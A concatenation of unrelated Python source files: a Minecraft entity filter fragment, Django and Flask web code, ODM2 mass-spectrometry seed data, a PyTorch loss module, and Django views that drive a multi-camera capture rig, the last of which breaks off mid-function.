e["powered"] = TAG_Byte(0)
if blockId != noop and e["id"].value == "Enderman":
e["carried"] = TAG_Short(blockId)
if blockData != noop and e["id"].value == "Enderman":
e["carriedData"] = TAG_Short(blockData)
if profession != "N/A" and e["id"].value == "Villager":
e["Profession"] = TAG_Int(Professions[profession])
if size != noop and e["id"].value == "Slime":
e["Size"] = TAG_Int(size)
if breedTicks != noop:
e["InLove"] = TAG_Int(breedTicks)
if age != noop:
e["Age"] = TAG_Int(age)
chunk.dirty = True
|
from websiteapp import models
from rest_framework.serializers import ModelSerializer,SerializerMethodField
class IconSerializer(ModelSerializer):
handle_link = SerializerMethodField()
class Meta:
model = models.WebSite
fields = ['icon','handle_link']
def get_handle_link(self, instance):
'''
:param instance:
:return:返回当前地址 http://localhost:8000
'''
request = self.context.get('request')
return f'{request.scheme}://{request.get_host()}/' |
from bs4 import BeautifulSoup
from IPython import embed
def generate_html():
return """
<html>
<head></head>
<body>
<a href="/a.html">A</a>
<a href="/b.html">B</a>
<a href="/c.html">C</a>
<a href="/d.html">D</a>
</body>
</html>
"""
def main():
html_doc = generate_html()
embed()
# soup = BeautifulSoup(html_doc, "html.parser")
# a_elements = soup.find_all("a", href=True)
# for a_element in a_elements:
# print(a_element['href'])
# [a_element['href'] for a_element in BeautifulSoup(html_doc, "html.parser").find_all("a", href=True)]
if __name__ == "__main__":
main() |
import os
from sqlalchemy import create_engine
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
import jinja2
import requests, json
from datetime import datetime
# Finding all our directories for this template
base_dir = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..'))
template_dir = os.path.join(base_dir, 'templates')
static_dir = os.path.join(base_dir, 'static')
base_template_dir = os.path.join(template_dir, 'base_templates')
# Making the Flask app
app = Flask(__name__,
static_url_path='',
static_folder=static_dir)
# Adding some of the directories to Jinja (for loading templates)
my_loader = jinja2.ChoiceLoader([
app.jinja_loader,
jinja2.FileSystemLoader([template_dir,
base_template_dir,
static_dir]),
])
app.jinja_loader = my_loader
# Load the config file
app.config.from_pyfile('config.py')
# Setup the final connection string for SQLAlchemy
app.config['SQLALCHEMY_DATABASE_URI'] = app.config['CONN_STR_W_DB']
db = SQLAlchemy(app)
# Import user after setup (important)
from user import User
from stripe_obj import Stripe
from notifications import Notifications
# Within our app context, create all missing tables
db.create_all()
login_manager = LoginManager(app)
login_manager.session_protection = 'basic'
@login_manager.user_loader
def load_user(id):
r = requests.get('http://' + app.config['BASE_URL'] + ':' + app.config['USER_PORT'] + '/getuser/' + str(id))
if r.status_code == 200:
user_dict = json.loads(r.text)
user = User(**user_dict)
user.created_date = datetime.strptime(user.created_date, '%a, %d %b %Y %H:%M:%S %Z')
return user
else:
return None
@app.after_request
def add_security_headers(response):
response.headers['X-Content-Type-Options'] = 'nosniff'
response.headers['X-Frame-Options'] = 'SAMEORIGIN'
response.headers['X-XSS-Protection'] = '1; mode=block'
# If you want all HTTP converted to HTTPS
# response.headers['Strict-Transport-Security'] = 'max-age=31536000; includeSubDomains'
return response
print('>>>App is setup') |
import json
from typing import List
from odm2_postgres_api.schemas.schemas import (
SamplingFeaturesCreate,
MethodsCreate,
VariablesCreate,
ControlledVocabularyCreate,
AnnotationsCreate,
DirectivesCreate,
)
def mass_spec_annotations() -> List[AnnotationsCreate]:
mass_spec_annotations_list = [
{
"annotationtypecv": "Specimen annotation",
"annotationtext": "Non-target mass spectrometry",
},
{
"annotationtypecv": "Specimen annotation",
"annotationtext": "blank",
},
{
"annotationtypecv": "Specimen annotation",
"annotationtext": "subject",
},
]
return [AnnotationsCreate(**a) for a in mass_spec_annotations_list]
def mass_spec_directives() -> List[DirectivesCreate]:
mass_spec_directives_list = [
{
"directivetypecv": "Project",
"directivename": "mass_spec:test_project",
"directivedescription": "This project is used for testing software",
},
{
"directivetypecv": "Project",
"directivename": "mass_spec:md_screening_2020",
"directivedescription": "non target screening requested by miljødirektoratet",
},
{
"directivetypecv": "Project",
"directivename": "mass_spec:1000lakes_2020",
"directivedescription": "non target screening within 1000lakes project",
},
{
"directivetypecv": "Project",
"directivename": "mass_spec:ARMOUR_china_test",
"directivedescription": "Non target analysis of chinese drinking water data",
},
{
"directivetypecv": "Project",
"directivename": "mass_spec:Processing_at_NILU",
"directivedescription": "Non target analysis ran by NILU researchers",
},
{
"directivetypecv": "Project",
"directivename": "mass_spec:Processing_at_NILU_test",
"directivedescription": "Non target analysis ran by NILU researchers",
},
]
return [DirectivesCreate(**d) for d in mass_spec_directives_list]
def mass_spec_sampling_features() -> List[SamplingFeaturesCreate]:
sampling_features = [
{
"samplingfeatureuuid": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
"samplingfeaturetypecv": "Site",
"samplingfeaturecode": "901-3-8",
"samplingfeaturename": "Dalsvatnet",
"samplingfeaturedescription": "Station ID: 3275",
}
]
return [SamplingFeaturesCreate(**sf) for sf in sampling_features]
mass_spec_cv = [
{
"name": "LC_QTOF_Raw",
"term": "Raw data produced by Liquid Chromatography coupled to Quadrupole Time of Flight instrument",
"definition": "Raw data produced by Liquid Chromatography coupled to Quadrupole Time of Flight instrument",
"category": "Chemistry",
"controlled_vocabulary_table_name": "cv_variablename",
},
{
"name": "LC_QTOF_mzXML",
"term": "Data produced by Liquid Chromatography coupled to Quadrupole Time of Flight instrument"
"and converted to mzXML format",
"definition": "Data produced by Liquid Chromatography coupled to Quadrupole Time of Flight "
"instrument and converted to mzXML format",
"category": "Chemistry",
"controlled_vocabulary_table_name": "cv_variablename",
},
{
"name": "LC_QTOF_Peaks",
"term": "Peaks detected by Liquid Chromatography coupled to Quadrupole Time of Flight instrument",
"definition": "List of peaks and their properties to be further identified as chemicals",
"category": "Chemistry",
"controlled_vocabulary_table_name": "cv_variablename",
},
{
"name": "LC_QTOF_Peaks_and_Fragments",
"term": "Peaks and their fragments "
"detected by Liquid Chromatography coupled to Quadrupole Time of Flight instrument",
"definition": "List of peaks, associated peaks and their properties to be further identified as chemicals",
"category": "Chemistry",
"controlled_vocabulary_table_name": "cv_variablename",
},
{
"name": "LC_QTOF_Chemicals",
"term": "Chemicals detected by Liquid Chromatography coupled to Quadrupole Time of Flight instrument",
"definition": "List of chemicals identified based on LC_QTOF_Peaks_and_Fragments",
"category": "Chemistry",
"controlled_vocabulary_table_name": "cv_variablename",
},
]
def mass_spec_controlled_vocabularies() -> List[ControlledVocabularyCreate]:
return [ControlledVocabularyCreate(**cv) for cv in mass_spec_cv]
def mass_spec_variables() -> List[VariablesCreate]:
mass_spec_variables_list = [
{
"variabletypecv": "Chemistry",
"variablenamecv": "LC_QTOF_Raw",
"variabledefinition": "Raw data produced by Liquid Chromatography coupled to Quadrupole Time of Flight "
"instrument",
"variablecode": f"mass_spec_00",
"nodatavalue": -9999,
},
{
"variabletypecv": "Chemistry",
"variablenamecv": "LC_QTOF_mzXML",
"variabledefinition": "Data produced by Liquid Chromatography coupled to Quadrupole Time of Flight "
"instrument and converted to mzXML format",
"variablecode": f"mass_spec_01",
"nodatavalue": -9999,
},
{
"variabletypecv": "Chemistry",
"variablenamecv": "LC_QTOF_Peaks",
"variabledefinition": "Peaks detected by Liquid Chromatography coupled to Quadrupole Time of Flight "
"instrument",
"variablecode": f"mass_spec_1",
"nodatavalue": -9999,
},
{
"variabletypecv": "Chemistry",
"variablenamecv": "LC_QTOF_Peaks_and_Fragments",
"variabledefinition": "Peaks and fragments detected by Liquid Chromatography coupled to Quadrupole "
"Time of Flight instrument",
"variablecode": f"mass_spec_2",
"nodatavalue": -9999,
},
{
"variabletypecv": "Chemistry",
"variablenamecv": "LC_QTOF_Chemicals",
"variabledefinition": "Peaks identified in Liquid Chromatography coupled to Quadrupole Time of Flight "
"instrument",
"variablecode": f"mass_spec_3",
"nodatavalue": -9999,
},
]
return [VariablesCreate(**v) for v in mass_spec_variables_list]
def mass_spec_methods(org_id: int) -> List[MethodsCreate]:
methods = [
{
"methodtypecv": "Specimen collection",
"methodcode": "mass_spec:collect_sample",
"methodname": "collect_sample",
"methoddescription": "Collecting sample in the field",
"organizationid": org_id,
},
{
"methodtypecv": "Specimen fractionation",
"methodcode": "mass_spec:fractionate_sample",
"methodname": "fractionate_sample",
"methoddescription": "Create a set of sub-samples",
"organizationid": org_id,
},
{
"methodtypecv": "Specimen analysis",
"methodcode": "mass_spec:create_data",
"methodname": "ms run",
"methoddescription": "Running mass spectrometer",
"organizationid": org_id,
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:ms_convert_filter_scanEvent_1_2",
"methodname": "ms convert",
"methoddescription": "",
"organizationid": org_id,
"annotations": [
{
"annotationtypecv": "Method annotation",
"annotationtext": "The json field holds the parameters with which this method will be executed",
"annotationjson": json.dumps(
{
"verbose": "-v",
"bits": "--32",
"output": "--mzXML",
"filter": ' --filter "scanEvent 1-2"',
}
),
}
],
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:ms_convert",
"methodname": "ms convert",
"methoddescription": "",
"organizationid": org_id,
"annotations": [
{
"annotationtypecv": "Method annotation",
"annotationtext": "The json field holds the parameters with which this method will be executed",
"annotationjson": json.dumps({"verbose": "-v", "bits": "--32", "output": "--mzXML"}),
}
],
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:filter_blanks",
"methodname": "blank filter",
"methoddescription": "Remove from peak list peaks which replicate in blank sample replicas.",
"organizationid": org_id,
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:filter_replicas",
"methodname": "replica filter",
"methoddescription": "Remove from peak list peaks which do not replicas in all "
"replicas of the parent sample.",
"organizationid": org_id,
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:filter_replicas_and_blanks",
"methodname": "replica and blank filter",
"methoddescription": "Remove from peak list peaks which do not replicas in all "
"replicas of the parent sample. Subsequently remove from peak list peaks "
"which do not replicas in all "
"replicas of the parent sample.",
"organizationid": org_id,
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:combine_features",
"methodname": "feature combination",
"methoddescription": "After feature deconvolution has completed for multiple replicas, "
"a list of peaks is output for each replica. These are combined into a single "
"list of peaks, in which non-replicating peaks are removed and replicating peaks "
"are averaged. This is the input peak list for feature identification.",
"organizationid": org_id,
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:fd_s3D",
"methodname": "feature detection",
"methoddescription": "Detects features in raw data. This is method is a sudo 3D method"
"where 1 gaussian is fit in each direction.",
"organizationid": org_id,
"annotations": [
{
"annotationtypecv": "Method annotation",
"annotationtext": "The json field holds the parameters with which this method will be executed",
"annotationjson": json.dumps(
{
"mz_range": [0, 0],
"n_iter": 20000,
"n_scan": 300,
"mz_res": 20000,
"mz_win": 0.02,
"adj_r2": 0.75,
"min_int": 1000,
"int_var": 5,
"s2n": 2,
"min_nscan": 3,
}
),
}
],
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:fd_s3D_test",
"methodname": "feature detection",
"methoddescription": "Detects features in raw data. This is method is a sudo 3D method"
"where 1 gaussian is fit in each direction.",
"organizationid": org_id,
"annotations": [
{
"annotationtypecv": "Method annotation",
"annotationtext": "The json field holds the parameters with which this method will be executed",
"annotationjson": json.dumps(
{
"mz_range": [0, 0],
"n_iter": 200,
"n_scan": 300,
"mz_res": 20000,
"mz_win": 0.02,
"adj_r2": 0.75,
"min_int": 1000,
"int_var": 5,
"s2n": 2,
"min_nscan": 3,
}
),
}
],
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:fd_0.5.22",
"methodname": "feature detection",
"methoddescription": "Detects features in raw data. This is method is a sudo 3D method"
"where 1 gaussian is fit in each direction.",
"organizationid": org_id,
"annotations": [
{
"annotationtypecv": "Method annotation",
"annotationtext": "The json field holds the parameters with which this method will be executed",
"annotationjson": json.dumps(
{
"mz_range": [0, 0],
"n_iter": 20000,
"n_scan": 300,
"mz_res": 20000,
"mz_win": 0.02,
"adj_r2": 0.75,
"min_int": 1000,
"int_var": 5,
"s2n": 2,
"min_nscan": 3,
"safd": "e9f11c2",
}
),
}
],
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:fd_0.5.31",
"methodname": "feature detection",
"methoddescription": "Detects features in raw data. This is method is a sudo 3D method"
"where 1 gaussian is fit in each direction.",
"organizationid": org_id,
"annotations": [
{
"annotationtypecv": "Method annotation",
"annotationtext": "The json field holds the parameters with which this method will be executed",
"annotationjson": json.dumps(
{
"mz_range": [0, 0],
"n_iter": 20000,
"n_scan": 300,
"mz_res": 20000,
"mz_win": 0.02,
"adj_r2": 0.75,
"min_int": 1000,
"int_var": 5,
"s2n": 2,
"min_nscan": 3,
"safd": "8cb7c42",
}
),
}
],
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:fd_0.5.22_int4000",
"methodname": "feature detection",
"methoddescription": "Detects features in raw data. This is method is a sudo 3D method"
"where 1 gaussian is fit in each direction.",
"organizationid": org_id,
"annotations": [
{
"annotationtypecv": "Method annotation",
"annotationtext": "The json field holds the parameters with which this method will be executed",
"annotationjson": json.dumps(
{
"mz_range": [0, 0],
"n_iter": 20000,
"n_scan": 300,
"mz_res": 20000,
"mz_win": 0.02,
"adj_r2": 0.75,
"min_int": 4000,
"int_var": 5,
"s2n": 2,
"min_nscan": 3,
"safd": "e9f11c2",
}
),
}
],
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:fd_0.5.22_test",
"methodname": "feature detection",
"methoddescription": "Detects features in raw data. This is method is a sudo 3D method"
"where 1 gaussian is fit in each direction.",
"organizationid": org_id,
"annotations": [
{
"annotationtypecv": "Method annotation",
"annotationtext": "The json field holds the parameters with which this method will be executed",
"annotationjson": json.dumps(
{
"mz_range": [0, 0],
"n_iter": 200,
"n_scan": 300,
"mz_res": 20000,
"mz_win": 0.02,
"adj_r2": 0.75,
"min_int": 1000,
"int_var": 5,
"s2n": 2,
"min_nscan": 3,
"safd": "e9f11c2",
}
),
}
],
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:fdc_comp_DIA",
"methodname": "feature deconvolution",
"methoddescription": "Find fragments for peaks detected with fd_* method."
"Upgraded version of fdc which considers adducts.",
"organizationid": org_id,
"annotations": [
{
"annotationtypecv": "Method annotation",
"annotationtext": "The json field holds the parameters with which this method will be executed",
"annotationjson": json.dumps(
{
"mz_range": [0, 0],
"mass_win_per": 0.8,
"ret_win_per": 0.5,
"delta_mass": 0.004,
"min_int_frag": 300,
"r_thresh": 0.75,
}
),
}
],
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:fid_ulsa",
"methodname": "feature identification",
"methoddescription": "Identifies features previously detected using a fd_* and fdc methods. ",
"organizationid": org_id,
"annotations": [
{
"annotationtypecv": "Method annotation",
"annotationtext": "The json field holds the parameters with which this method will be executed",
"annotationjson": json.dumps({"id_feature_wgts": [1, 1, 1, 1, 1, 1, 1]}),
}
],
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:fdc_0.8.30",
"methodname": "feature deconvolution",
"methoddescription": "Find fragments for peaks detected with fd_* method."
"Upgraded version of fdc which considers adducts.",
"organizationid": org_id,
"annotations": [
{
"annotationtypecv": "Method annotation",
"annotationtext": "The json field holds the parameters with which this method will be executed",
"annotationjson": json.dumps(
{
"mz_range": [0, 0],
"mass_win_per": 0.8,
"ret_win_per": 0.5,
"delta_mass": 0.004,
"min_int_frag": 300,
"r_thresh": 0.75,
"compcreate": "76f14c5",
}
),
}
],
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:fdc_0.9.5",
"methodname": "feature deconvolution",
"methoddescription": "Find fragments for peaks detected with fd_* method."
"Upgraded version of fdc which considers adducts.",
"organizationid": org_id,
"annotations": [
{
"annotationtypecv": "Method annotation",
"annotationtext": "The json field holds the parameters with which this method will be executed",
"annotationjson": json.dumps(
{
"mz_range": [0, 0],
"mass_win_per": 0.8,
"ret_win_per": 0.5,
"delta_mass": 0.004,
"min_int_frag": 300,
"r_thresh": 0.75,
"compcreate": "7e4f21e",
}
),
}
],
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:fdc_0.9.11",
"methodname": "feature deconvolution",
"methoddescription": "Find fragments for peaks detected with fd_* method."
"Upgraded version of fdc which considers adducts.",
"organizationid": org_id,
"annotations": [
{
"annotationtypecv": "Method annotation",
"annotationtext": "The json field holds the parameters with which this method will be executed",
"annotationjson": json.dumps(
{
"mz_range": [0, 0],
"mass_win_per": 0.8,
"ret_win_per": 0.5,
"delta_mass": 0.004,
"min_int_frag": 300,
"r_thresh": 0.75,
"compcreate": "9b94edf",
}
),
}
],
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:fid_0.4.7",
"methodname": "feature identification",
"methoddescription": "Identifies features previously detected using a fd_* and fdc methods. ",
"organizationid": org_id,
"annotations": [
{
"annotationtypecv": "Method annotation",
"annotationtext": "The json field holds the parameters with which this method will be executed",
"annotationjson": json.dumps({"id_feature_wgts": [1, 1, 1, 1, 1, 1, 1], "ulsa": "b1fa044"}),
}
],
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:fid_0.4.9",
"methodname": "feature identification",
"methoddescription": "Identifies features previously detected using a fd_* and fdc methods. ",
"organizationid": org_id,
"annotations": [
{
"annotationtypecv": "Method annotation",
"annotationtext": "The json field holds the parameters with which this method will be executed",
"annotationjson": json.dumps({"id_feature_wgts": [1, 1, 1, 1, 1, 1, 1], "ulsa": "1ede498"}),
}
],
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:fid_0.4.5",
"methodname": "feature identification",
"methoddescription": "Identifies features previously detected using a fd_* and fdc methods. ",
"organizationid": org_id,
"annotations": [
{
"annotationtypecv": "Method annotation",
"annotationtext": "The json field holds the parameters with which this method will be executed",
"annotationjson": json.dumps({"id_feature_wgts": [1, 1, 1, 1, 1, 1, 1], "ulsa": "7301d29"}),
}
],
},
{
"methodtypecv": "Derivation",
"methodcode": "mass_spec:fid_0.5.8",
"methodname": "feature identification",
"methoddescription": "Identifies features previously detected using a fd_* and fdc methods. ",
"organizationid": org_id,
"annotations": [
{
"annotationtypecv": "Method annotation",
"annotationtext": "The json field holds the parameters with which this method will be executed",
"annotationjson": json.dumps({"id_feature_wgts": [1, 1, 1, 1, 1, 1, 1], "ulsa": "6cbad51"}),
}
],
},
]
# CompCreate
return [MethodsCreate(**m) for m in methods]
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: Donny You(youansheng@gmail.com)
# Loss function for Image Classification.
import torch.nn as nn
from model.pose.loss.mse_loss import MseLoss
BASE_LOSS_DICT = dict(
mse_loss=0,
)
class Loss(nn.Module):
def __init__(self, configer):
super(Loss, self).__init__()
self.configer = configer
self.func_list = [MseLoss(self.configer),]
def forward(self, out_list):
loss_dict = out_list[-1]
out_dict = dict()
weight_dict = dict()
for key, item in loss_dict.items():
out_dict[key] = self.func_list[int(item['type'].float().mean().item())](*item['params'])
weight_dict[key] = item['weight'].mean().item()
loss = 0.0
for key in out_dict:
loss += out_dict[key] * weight_dict[key]
out_dict['loss'] = loss
return out_dict
|
#
# Copyright (c) 2017 Electronic Arts Inc. All Rights Reserved
#
import datetime
import urllib2
import json
import time
import os
import logging
from ava.settings import BASE_DIR
from base64 import b64encode, b64decode
from rest_framework import viewsets
from models import CaptureNode, Camera, CaptureLocation
from serializers import CaptureNodeSerializer, CameraSerializer
from rest_framework.decorators import api_view, permission_classes
from rest_framework.permissions import IsAuthenticated
from common.views import JSONResponse
from common.uuid_utils import uuid_node_base36
from django.utils import timezone
from django.http import HttpResponse
from django.views.decorators.cache import never_cache
from django.db.models import Count
from rest_framework import permissions
from archive.models import Project as ArchiveProject
from archive.models import Session as ArchiveSession
from archive.models import Shot as ArchiveShot
from archive.models import Take as ArchiveTake
from archive.models import Camera as ArchiveCamera
from jobs.models import FarmJob, FarmNode
from multiprocessing.pool import ThreadPool
g_pool = ThreadPool(32)
g_logger = logging.getLogger('dev')
DEFAULT_NODE_HTTP_TIMEOUT = 5
def has_write_access_location_id(request, location_id):
return request.user.access_rights.filter(id=location_id, locationaccess__write_access=True).count()>0
def has_write_access_node(request, node):
return has_write_access_location_id(request, node.location.id)
def create_session_shot(location_id, session_id, shot_name):
# When a new take begins, create new entries in the database for the session and shot, if necessary
changed = False
loc = CaptureLocation.objects.get(pk=location_id)
# We are capturing on a specific session
if session_id is not None and not loc.cur_session == session_id:
loc.cur_session = ArchiveSession.objects.get(pk=session_id)
changed = True
if (not loc.cur_shot) or (not loc.cur_shot.name == shot_name):
if not shot_name or shot_name=='-new-': # if shot is unnamed, make up a name from the index
shot_name = "Shot_%04d"%loc.cur_session.shots.count()
shot = ArchiveShot(name=shot_name, session=loc.cur_session)
shot.save()
loc.cur_shot = shot
changed = True
if changed:
loc.save()
def register_new_take(location_id, summary):
# Record information about this take in the database
# Session and Shot should already be created and referenced in cur_session and cur_shot
loc = CaptureLocation.objects.get(pk=location_id)
if loc.cur_project:
if not loc.cur_session or not loc.cur_shot:
print 'ERROR> Session and Shot should be created'
return
# Create Take
take = ArchiveTake(name='Take_%04d'%loc.cur_shot.next_take, shot=loc.cur_shot, sequence=loc.cur_shot.next_take)
take.save()
# Add cameras to take
for node in summary['nodes']:
if 'summary' in node:
if 'cameras' in node['summary']:
# Locate capture node and cameras
db_capture_nodes = CaptureNode.objects.filter(location=location_id, machine_name=node['machine_name'])
cam_index = 0
for cam in node['summary']['cameras']:
unique_id = cam['camera']['unique_id']
# clash (takeids are not unique across machines)
filename = '%08d_%03d_%s_%s.jpg' % (take.id, cam_index, unique_id, uuid_node_base36())
filepath = os.path.join(BASE_DIR, 'static', 'thumb', filename)
try:
base64_thumbnail = b64decode(cam['jpeg_thumbnail']+'='*10)
with open(filepath, 'wb') as f:
f.write(base64_thumbnail)
except Exception as e:
print e
cam['thumb_filename'] = filename
all_files = []
all_files.extend(cam['recorder']['filenames'])
all_files.append(cam['meta']['meta_filename'])
# Find associated camera in db
db_cam = Camera.objects.filter(node__location=location_id, node__machine_name=node['machine_name'], unique_id=unique_id)[0]
camera = ArchiveCamera(
take=take,
unique_id=unique_id,
machine_name=node['machine_name'],
model=cam['camera']['model'],
version=cam['camera']['version'],
using_sync=cam['camera']['using_hardware_sync'],
folder=cam['recorder']['filenames'][0],
thumbnail_filename=filename,
width=cam['camera']['width'],
height=cam['camera']['height'],
bitdepth=cam['meta']['bitdepth'],
frame_count=cam['meta']['frame_count'],
dropped_frames=cam['meta']['missing_frames'],
total_size=cam['recorder']['total_size'],
duration=cam['meta']['duration'],
framerate=cam['camera']['framerate'],
rotation=db_cam.rotation,
all_files=';'.join(all_files)
)
camera.save()
cam_index = cam_index + 1
summary['project_name'] = loc.cur_project.name
summary['session_name'] = loc.cur_session.name
summary['shot_name'] = loc.cur_shot.name
summary['take_index'] = take.sequence
summary['take_id'] = take.id
loc.cur_shot.increment_take()
loc.save()
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_toggle_using_sync(request):
if request.method == 'POST':
j = json.loads(request.body)
if 'camera_id' in j:
camera = Camera.objects.get(pk=j['camera_id'])
if camera:
if not has_write_access_node(request, camera.node):
return HttpResponse(status=403)
camera.using_sync = not camera.using_sync
camera.save()
url = 'http://%s:8080/toggle_using_sync/%s/%s' % (camera.node.ip_address, camera.unique_id, camera.using_sync)
try:
urllib2.urlopen(url, data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
except Exception as e:
g_logger.error('post_toggle_using_sync %s: %s' % (camera.node.machine_name, e))
return HttpResponse('Ok')
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_close_node(request):
if request.method == 'POST':
j = json.loads(request.body)
if 'node_id' in j:
node = CaptureNode.objects.get(pk=j['node_id'])
if node:
print node
url = 'http://%s:8080/close_node' % (node.ip_address)
try:
urllib2.urlopen(url, data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
except Exception as e:
g_logger.error('%s: %s' % (url, e))
return HttpResponse('Ok')
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_set_camera_rotation(request):
if request.method == 'POST':
j = json.loads(request.body)
if 'camera_id' in j and 'angle' in j:
cam = Camera.objects.get(pk=j['camera_id'])
if not has_write_access_node(request, cam.node):
return HttpResponse(status=403)
cam.rotation = j['angle']
cam.save()
return HttpResponse('Ok')
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_toggle_capturing(request):
if request.method == 'POST':
j = json.loads(request.body)
if 'camera_id' in j:
cam = Camera.objects.get(pk=j['camera_id'])
if cam:
if not has_write_access_node(request, cam.node):
return HttpResponse(status=403)
url = 'http://%s:8080/toggle_capturing/%s/' % (cam.node.ip_address, cam.unique_id)
try:
urllib2.urlopen(url, data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
except Exception as e:
g_logger.error('%s: %s' % (url, e))
return HttpResponse('Ok')
return HttpResponse('Camera %d not found' % j['camera_id'], status=404)
return HttpResponse(status=500)
def parallel_all_prepare_multi1(node):
try:
serialized_data = urllib2.urlopen('http://%s:8080/all_prepare_multi1' % node.ip_address, data="", timeout=20).read()
except Exception as e:
g_logger.error('parallel_all_prepare_multi1 %s: %s' % (node.machine_name, e))
# TODO Check result from every node, otherwise, cancel the recording
def parallel_all_prepare_multi2(node):
try:
serialized_data = urllib2.urlopen('http://%s:8080/all_prepare_multi2' % node.ip_address, data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
except Exception as e:
g_logger.error('parallel_all_prepare_multi2 %s: %s' % (node.machine_name, e))
# TODO Check result from every node, otherwise, cancel the recording
def parallel_all_start_multi(node):
try:
serialized_data = urllib2.urlopen('http://%s:8080/all_start_multi' % node.ip_address, data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
except Exception as e:
g_logger.error('parallel_all_start_multi %s: %s' % (node.machine_name, e))
# TODO Check result from every node, otherwise, cancel the recording
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_start_recording(request):
if request.method == 'POST':
j = json.loads(request.body)
if 'location' in j:
location_id = j['location']
if not has_write_access_location_id(request, location_id):
return HttpResponse(status=403)
session_id = j['session_id'] if 'session_id' in j else None
shot_name = j['shot'] if 'shot' in j else None
create_session_shot(location_id, session_id, shot_name)
nodes = CaptureNode.objects.filter(location__id=location_id, online=True)
# Prepare Multi Image Capture
g_pool.map(parallel_all_prepare_multi1, nodes)
g_pool.map(parallel_all_prepare_multi2, nodes)
# Start Multi Image Capture
g_pool.map(parallel_all_start_multi, nodes)
return HttpResponse('Ok')
def parallel_pause_sync(node):
try:
serialized_data = urllib2.urlopen('http://%s:8080/pause_sync' % node.ip_address, data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
except Exception as e:
g_logger.error('parallel_pause_sync %s: %s' % (node.machine_name, e))
def parallel_resume_sync(node):
try:
serialized_data = urllib2.urlopen('http://%s:8080/resume_sync' % node.ip_address, data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
except Exception as e:
g_logger.error('parallel_resume_sync %s: %s' % (node.machine_name, e))
def parallel_all_stop_recording(p):
node, summary = p
try:
serialized_data = urllib2.urlopen('http://%s:8080/all_stop_recording' % node.ip_address, data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
j = json.loads(serialized_data)
if 'summary' in j:
node_summary = {}
node_summary['machine_name'] = node.machine_name
node_summary['ip_address'] = node.ip_address
node_summary['summary'] = j['summary']
summary.append(node_summary)
except Exception as e:
g_logger.error('parallel_all_stop_recording %s: %s' % (node.machine_name, e))
def add_rotation_info_to_cameras(summary):
# Add rotation flag to all cameras (this info is in th DB, and does not come from the nodes)
for node_summary in summary['nodes']:
for camera_summary in node_summary['summary']['cameras']:
try:
camera_summary['rotation'] = Camera.objects.filter(unique_id=camera_summary['camera']['unique_id'], node__machine_name=node_summary['machine_name'])[0].rotation
except Exception as e:
g_logger.error('Could not get rotation flag : %s' % (e))
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_stop_recording(request):
if request.method == 'POST':
j = json.loads(request.body)
if 'location' in j:
location_id = j['location']
if not has_write_access_location_id(request, location_id):
return HttpResponse(status=403)
summary = {}
summary['result'] = 'OK'
summary['nodes'] = []
nodes = CaptureNode.objects.filter(location__id=location_id, online=True)
# Pause Sync all nodes
g_pool.map(parallel_pause_sync, nodes)
# Delay for all cameras to catch up for the last frame being transfered from the camera
time.sleep(0.5)
# Stop Recording All Nodes
g_pool.map(parallel_all_stop_recording, [(n,summary['nodes']) for n in nodes])
# Resume sync for preview on all nodes
g_pool.map(parallel_resume_sync, nodes)
# Add rotation flag to all cameras (this info is in th DB, and does not come from the nodes)
add_rotation_info_to_cameras(summary)
# Store capture in archive
register_new_take(location_id, summary)
return JSONResponse(summary)
def parallel_all_prepare_single(node):
try:
serialized_data = urllib2.urlopen('http://%s:8080/all_prepare_single' % node.ip_address, data="", timeout=30).read()
except Exception as e:
g_logger.error('parallel_all_prepare_single %s: %s' % (node.machine_name, e))
# TODO Check that we got a result from all computers, otherwise, cancel this recording and set error
# TODO Send a cancel to all nodes?
def parallel_all_start_single(node):
try:
serialized_data = urllib2.urlopen('http://%s:8080/all_start_single' % node.ip_address, data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
except Exception as e:
g_logger.error('parallel_all_start_single %s: %s' % (node.machine_name, e))
# TODO If we did not get a reply from all computers, continue, but mark this recording as bad
def parallel_all_finalize_single(p):
node, summary = p
try:
serialized_data = urllib2.urlopen('http://%s:8080/all_finalize_single' % node.ip_address, data="", timeout=20).read()
j = json.loads(serialized_data)
if 'summary' in j:
node_summary = {}
node_summary['machine_name'] = node.machine_name
node_summary['ip_address'] = node.ip_address
node_summary['summary'] = j['summary']
summary.append(node_summary)
except Exception as e:
